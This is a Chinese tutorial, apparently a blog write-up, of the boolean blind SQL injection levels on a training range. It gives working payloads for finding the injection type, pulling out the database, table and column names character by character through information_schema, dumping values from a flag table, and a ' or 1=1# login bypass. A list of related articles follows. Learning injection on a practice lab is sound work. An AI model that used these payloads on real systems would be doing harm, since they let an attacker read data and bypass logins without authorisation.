文章目录

  • 布尔盲注(一)
  • 布尔盲注(二)
  • 布尔盲注(三)

布尔盲注(一)

1、判断注入类型

id=1 and 1=1//有数据
id=1 and 1=2//no results found

判断为数字型布尔盲注

2、判断数据库长度,获取数据库名

and length(database())=1

数据库名长12

抓包,爆破,获取

and ascii(substr(database(),1,1))=1

获取数据库名

3、判断有几个表,并获取第一个表的表名

判断有几个表,并获取表名的长度

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1


可见这个库下有三个表

获取第一个表的表名

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1

得到表名

4、获取表下的字段数目,并获取第一个字段的字段名

获取该表下有几个字段,并确定他们的长度

and length((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1))=1


可见该表下有两个字段,且第一个字段长为2

获取第一个字段的字段名

and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1),1,1))=73


得到字段名

5、判断该字段下有几个字段值,并获取第一个字段值

获取字段值的总数目与长度

and length((select Id from loflag limit 0,1))=1


可见,有五个字段值,且他们的长度都为1

这样,我们猜测id的值均为数字,那么我们获取全部的字段值

and (select Id from loflag limit 0,1)=1

这样就得到该字段下的所有字段值

布尔盲注(二)

把双引号闭合,后续操作同(一)

布尔盲注(三)

使用' or 1=1#即可成功登录

封神台SQL注入-基础靶场1-布尔盲注相关推荐

  1. SQL注入进阶:掌握布尔盲注和延时注入攻击技巧

    数据来源 一.什么是盲注? 盲注是指一种利用应用程序漏洞进行的攻击技术,攻击者通过在输入参数中注入恶意代码或数据来探测.提取和修改应用程序的敏感数据.它通常用于测试 Web 应用程序的安全性,并且可能 ...

  2. 【SQL注入漏洞-04】布尔盲注靶场实战

    布尔盲注 当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注. 布尔盲注原理: 利用页面返回的布尔 ...

  3. SQL注入(SQL注入(SQLi)攻击)攻击-布尔盲注

    页面没有显示位 , 没有报错信息 , 只有成功和不成功两种情况时 , 可以使用布尔盲注 本次以 SQLi LABS 第9关为案例进行讲解 布尔盲注常用的两个函数(我觉得) length('abc') ...

  4. 墨者学院-SQL注入漏洞测试(布尔盲注)

    决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...

  5. 渗透测试——sql注入进阶/基于时间的盲注/一看就会/

    目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...

  6. 封神台——手工注入基础(猫舍)

    题目提示很明显,就是sql注入拿到管理员密码 点击传送门进入看到的是一个很简陋的猫舍页面 域名简单,没看到注入点http://59.63.200.79:8003/ 点击新闻页面看看 域名后面加上了id ...

  7. 封神台SQL注入-宽字节

    一.原理 magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post.get.cookie过来的数据增加转义字符 ...

  8. 封神台SQL注入-延时注入

    一.原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击. 服务器没有错误回显,对于攻击者来说缺少了非常重要的"调试信息". 相关函数 length() => 返回( ...

  9. SQL注入漏洞测试(报错盲注)笔记

    这个是今天拿下的靶场,这是我作为小白学习的第二个靶场,做一下笔记 已知IP地址为:219.153.49.228,端口号为41280,访问了之后是下面的页面 看到这个页面之后,我进入了后台,查看之后知道 ...

最新文章

  1. CSS3 Media Queries:移动 Web 的完美开端
  2. tensorflow dataset_ops batch()方法 (将此数据集的连续元素合并为批)
  3. UDP通讯接收案例(组播方式)
  4. 大幅面多相机高精度定位及测量解决方案
  5. 静态变量读取属性文件_一种通过变量插值读取属性的方法
  6. 1.7Oob 继承关系中构造方法的使用
  7. dubbo forbid service的解决办法
  8. MapReduce过程详解及其性能优化
  9. 关于SAP的视图类型
  10. php批量删除例子,php批量删除数据完整实例代码
  11. 马哥Linux学习笔记之一——关于多磁盘的组织问题
  12. Windows下杀进程的命令
  13. wⅰndows办公软件2003,办公软件2003
  14. Notepad++的SQL格式化插件
  15. 关于脏读,不可重复读,幻读的理解
  16. 我“药水哥”硬气了 改行‘程序员’了
  17. Birt报表开发工具及Birt runtime部署
  18. Ol4网格生成以及优化
  19. sql group by 后取最后一条数据
  20. 通信协议之IIC协议(eeprom)_通俗易懂篇!

热门文章

  1. 电脑系统重装篇2:使用软碟通软件制作U盘系统安装盘(UltraISO)
  2. 局域网有几台电脑频繁断网_用Python将电脑变成服务器,只需要一行命令
  3. 优酷视频什么是登录保护?
  4. 阿里巴巴CEO张勇内部讲话:好的企业文化,要视人为人
  5. 如何使用Spring Boot促进java开发?高级java架构师为您详解!
  6. linux 中.sh文件如何打开运行
  7. 这样的简历,到哪里都是被淘汰的命!
  8. 公有云托管K8s服务百花齐放,企业如何统一纳管、便捷管理?
  9. NBA历史连胜记录和连胜记录及不可超越的记录
  10. 直播电商购物消费者满意度在线调查报告(四)